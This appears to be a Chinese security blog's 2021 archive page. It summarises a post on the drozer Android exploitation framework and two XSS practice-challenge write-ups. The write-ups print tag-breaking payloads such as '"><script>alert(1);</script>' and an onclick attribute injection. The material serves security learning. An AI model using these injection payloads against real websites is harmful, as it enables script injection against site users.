01 2021 档案
摘要:drozer是一款Android漏洞利用和安全评估框架。在drozer问世前,编写app的漏洞利用代码,得编译一个Android app,然后部署到手机上,如果要修改,得再编译部署一次。而drozer解决了这个问题,drozer通过drozer agent这个代理,像设备发送命令用来测试漏洞利用代码
阅读全文
摘要:1.<script>alert(1);</script> 2.显示文字区域过滤了<>,但是input没有过滤,payload:"><script>alert(1);</script> 3.显示文字区域和input都过滤了<>,payload:'onclick='javascript:alert(1)
阅读全文
摘要:1. <script>alert(document.domain)</script> 2. 先闭合input标签,再加入脚本:"><script>alert(document.domain)</script> 4. 可以利用参数p3:p1=11&p2=Japan&p3="><script>alert
阅读全文
